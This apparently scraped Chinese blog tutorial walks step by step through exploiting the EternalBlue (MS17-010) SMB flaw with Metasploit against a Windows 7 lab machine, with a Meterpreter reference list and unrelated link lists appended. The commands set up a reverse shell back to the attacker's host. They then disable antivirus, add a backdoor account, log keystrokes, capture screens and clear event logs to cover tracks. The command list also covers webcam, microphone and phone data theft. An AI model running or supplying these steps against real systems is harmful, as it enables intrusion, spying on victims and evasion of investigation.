|>>>中华人民共和国网络安全法<<<|警告:请勿用于非法用途,后果自负!

简介

一、概述

永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。

二、影响

2017年5月12日,不法分子通>过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

0.环境

  • 虚拟机(攻) KaliLinux
  • 虚拟机(靶机) Windows7
  • 同一局域网下

1.查询ip

ifconfig

Kali:192.168.43.149

ipconfig

Win7:192.168.43.82

2.打开metasploit工具

msfconsole

进入metasploit框架

3.搜询永恒之蓝漏洞

search ms17-010

4.使用辅助模块(非必要)

查看漏洞所需要配置。扫描存在此漏洞的主机,或判断指定主机是否存在该漏洞。

  • 1.使用辅助模块

    use auxiliary/scanner/smb/smb_ms17_010
  • 2.查看漏洞需要的配置

    show options



    可见该漏洞是需要主机开放445端口,且利用的是SMB服务进行攻击的。
  • 3.探测某ip范围内是有否存在该漏洞的主机

    set RHOST 192.168.43.80-192.168.43.180

    exploit

图中带[+]符号表示该主机192.168.43.82存在此漏洞(正是我们的靶机Windows7)。

5.使用漏洞模块

use exploit/windows/smb/ms17_010_eternalblue

1.查看漏洞针对的系统、版本等

show targes



2.查看攻击载荷payloads

show payloads



3.查看漏洞的详细(全部)信息

info



6.设置参数

查看需要设置的参数

show options

设置攻击载荷

set payload windows/x64/meterpreter/reverse_tcp

攻击靶机

set rhost 192.168.43.82

监听端

set lhost 192.168.43.149

监听端口(不设置默认为4444)

set lport xxxx

运行

exploit/run





显示meterpreter>说明攻击成功

7.演示 (后渗透阶段)

1).来次优雅的攻击

  • 进入win7终端
shell
  • 打开计算器
calc

  • 退出
exit

2).常用命令

  • 查看主机信息
sysinfo

  • 查看主机是否运行在虚拟机上
run post/windows/gather/checkvm

当然我们用的为虚拟机win7。真实环境下防止连接的为虚拟机,调虎离山。(?蜜罐)

  • 关闭杀毒软件
run killav

  • 文件操作(同linux)
pwd

cd

mkdir

rmdir

rm

mv

cat

ls

edit



  • 提升到系统权限
getsystem
  • 查看主机安装了那些应用
run post/windows/gather/enum_applications
  • 截屏
screenshot



3).其它命令

  • 创建新的用户
run getgui -u hack2 -p 123456

  • 查看当前进程
getpid
  • 查看所有进程
ps
  • 关闭进程
kill pid
  • 绑定进程
migrate pid
  • 记录键盘(通常需要绑定进程后)
开始 keyscan_start

显示 keyscan_dump

结束 keyscan_stop


    禁用(允许)键盘 uictl  disable (enable) keyboard

    禁用(允许)鼠标 uictl  disable (enable) mouse

4).最后别忘清理操作日志文件擦屁股哈哈哈

clearev

8.全部命令

翻译见 |>>>Msf---控制 Android手机<<<|

Stdapi: File system Commands

============================

    Command       Description

    -------       -----------

    cat           Read the contents of a file to the screen

    cd            Change directory

    checksum      Retrieve the checksum of a file

    cp            Copy source to destination

    dir           List files (alias for ls)

    download      Download a file or directory

    edit          Edit a file

    getlwd        Print local working directory

    getwd         Print working directory

    lcd           Change local working directory

    lls           List local files

    lpwd          Print local working directory

    ls            List files

    mkdir         Make directory

    mv            Move source to destination

    pwd           Print working directory

    rm            Delete the specified file

    rmdir         Remove directory

    search        Search for files

    upload        Upload a file or directory

Stdapi: Networking Commands

===========================

    Command       Description

    -------       -----------

    ifconfig      Display interfaces

    ipconfig      Display interfaces

    portfwd       Forward a local port to a remote service

    route         View and modify the routing table

Stdapi: System Commands

=======================

    Command       Description

    -------       -----------

    execute       Execute a command

    getuid        Get the user that the server is running as

    localtime     Displays the target system's local date and time

    pgrep         Filter processes by name

    ps            List running processes

    shell         Drop into a system command shell

    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands

===============================

    Command       Description

    -------       -----------

    screenshare   Watch the remote user's desktop in real time

    screenshot    Grab a screenshot of the interactive desktop

Stdapi: Webcam Commands

=======================

    Command        Description

    -------        -----------

    record_mic     Record audio from the default microphone for X seconds

    webcam_chat    Start a video chat

    webcam_list    List webcams

    webcam_snap    Take a snapshot from the specified webcam

    webcam_stream  Play a video stream from the specified webcam

Stdapi: Audio Output Commands

=============================

    Command       Description

    -------       -----------

    play          play a waveform audio file (.wav) on the target system

Android Commands

================

    Command           Description

    -------           -----------

    activity_start    Start an Android activity from a Uri string

    check_root        Check if device is rooted

    dump_calllog      Get call log

    dump_contacts     Get contacts list

    dump_sms          Get sms messages

    geolocate         Get current lat-long using geolocation

    hide_app_icon     Hide the app icon from the launcher

    interval_collect  Manage interval collection capabilities

    send_sms          Sends SMS from target session

    set_audio_mode    Set Ringer Mode

    sqlite_query      Query a SQLite database from storage

    wakelock          Enable/Disable Wakelock

    wlan_geolocate    Get current lat-long using WLAN information

Application Controller Commands

===============================

    Command        Description

    -------        -----------

    app_install    Request to install apk file

    app_list       List installed apps in the device

    app_run        Start Main Activty for package name

    app_uninstall  Request to uninstall application

Msf--永恒之蓝 ms17_010的更多相关文章

  1. 永恒之蓝ms17_010漏洞复现

    1.什么是永恒之蓝 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机. 2.SMB协议 SM ...

  2. Metasploit(msf)利用ms17_010(永恒之蓝)出现Encoding::UndefinedConversionError问题

    Metasploit利用ms17_010(永恒之蓝) 利用流程 先确保目标靶机和kali处于同一网段,可以互相Ping通 目标靶机防火墙关闭,开启了445端口 输入search ms17_010 搜索 ...

  3. PJzhang:ms17-010永恒之蓝漏洞在windows 2008R2中的复现

    猫宁!!! 参考: https://www.anquanke.com/post/id/86245 https://xz.aliyun.com/t/2536 https://www.cnblogs.co ...

  4. EternalBlue永恒之蓝漏洞复现

    EternalBlue漏洞复现 1.    实训目的 永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010.该漏洞利用工具由一个名为”影子经济人”( ...

  5. Metasploitable3学习笔记--永恒之蓝漏洞复现

    漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不 ...

  6. 永恒之蓝(MS17-010)检测与利用

    目录 利用Nmap检测 MSF反弹SHELL 注意 乱码 参考 利用Nmap检测 命令: nmap -p445 --script smb-vuln-ms17-010 [IP] # 如果运行报错,可以加 ...

  7. 关于NSA的EternalBlue(永恒之蓝) ms17-010漏洞利用

            好久没有用这个日志了,最近WannaCry横行,媒体铺天盖地的报道,我这后知后觉的才想起来研究下WannaCry利用的这个原产于美帝的国家安全局发现的漏洞,发现漏洞不说,可以,自己偷偷 ...

  8. 【漏洞复现】永恒之蓝 ms17-010 漏洞利用 攻击手法

    日期:2018-07-21 21:09:16 介绍:永恒之蓝利用的 ms17-010 漏洞,拿 Shell.查看文件.获取密码. 0x01.实验环境 攻击机 系统:macOS Sierra 10.12 ...

  9. MS17-010远程溢出漏洞 - 永恒之蓝 [CVE-2017-0143]

    MS17-010远程溢出漏洞(永恒之蓝) Ti:2019-12-25 By:Mirror王宇阳 MS17-010 CVE-2017-0143 MS17-010 CVE-2017-0144 MS17-0 ...

  10. 永恒之蓝MS17-010漏洞复现

    永恒之蓝MS17-010漏洞复现 1.漏洞描述: 起因: 永恒之蓝(Eternalblue)是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包 ...

随机推荐

  1. 学习笔记-vue.js获取file文件数据

    在vue中file不能像其他input一样使用 v-model 双向数据绑定,因为文件选择是只读,只能用onchange监控值得变化. 所有需要使用v-on:change去监控. 例1: <in ...

  2. [面试仓库]HTML面试题汇总

      HTML这一块呢,说简单也简单,说难也不是那么容易.但我们在各个面试要求中,大部分都把HTML这一条摆在了第一位,重要性可想而知.这个位置算是有关HTML的一个汇总点了,亦会在这里及时补充. 1, ...

  3. [C++]变量声明与定义的规则

    声明与定义分离 Tips:变量能且仅能被定义一次,但是可以被多次声明. 为了支持分离式编译,C++将定义和声明区分开.其中声明规定了变量的类型和名字,定义除此功能外还会申请存储空间并可能为变量赋一个初 ...

  4. Python:函数解释(面向过程)

    1. 函数概述 在编程的语境下,函数 (function) 是指一个有命名的.执行某个计算的语句序列 (sequence of statements) .函数可以针对某类问题建立了通用解决步骤(算法) ...

  5. 2. IntelliJ Idea 常用快捷键列表

    Ctrl+E,最近的文件 Ctrl+Shift+E,最近更改的文件 Shift+Click,可以关闭文件 Ctrl+[ OR ],可以跑到大括号的开头与结尾 Ctrl+F12,可以显示当前文件的结构 ...

  6. Java 常用类总结(SE基础)

    本篇博客对java常用类相关知识进行了归纳总结,比较详细,适用于学习和复习. 1. 字符串相关的类 1.1 String String是一个final类,代表不可变的字符序列.不可被继承. Strin ...

  7. 【cypress】4. 丰富的调试工具

    Cypress附带了一系列调试工具来帮助我们弄明白测试的经过,利于我们更好的调试. 具体这些工具的能力都有啥? 回到每个命令的快照. 可以看到特殊的已发生的page events. 接收关于每个命令的 ...

  8. 病毒木马查杀实战第013篇:一个基于.NET的“敲竹杠”病毒研究

    前言 恶意程序发展至今,其功能已经从最初的单纯破坏,不断发展为隐私的窥探,信息的盗取,乃至如今非常流行的"敲竹杠"病毒,用于勒索.可见随着时代的发展,病毒的作者们往往也是想利用自己 ...

  9. 病毒木马查杀实战第016篇:U盘病毒之逆向分析

    比对脱壳前后的程序 我们这次所要研究的是经过上次的脱壳操作之后,所获取的无壳病毒样本.其实我们这里可以先进行一下对比,看看有壳与无壳的反汇编代码的区别.首先用IDA Pro载入原始病毒样本: 图1 可 ...

  10. POJ3114强连通+spfa

    题意:       给你n个点,m条有向边,q询问,每次询问给两个数a,b输出a->b的最短路,但是题目有个限制,就是在一个环上的任意两点距离为0. 思路:       简单题目,直接强连通压缩 ...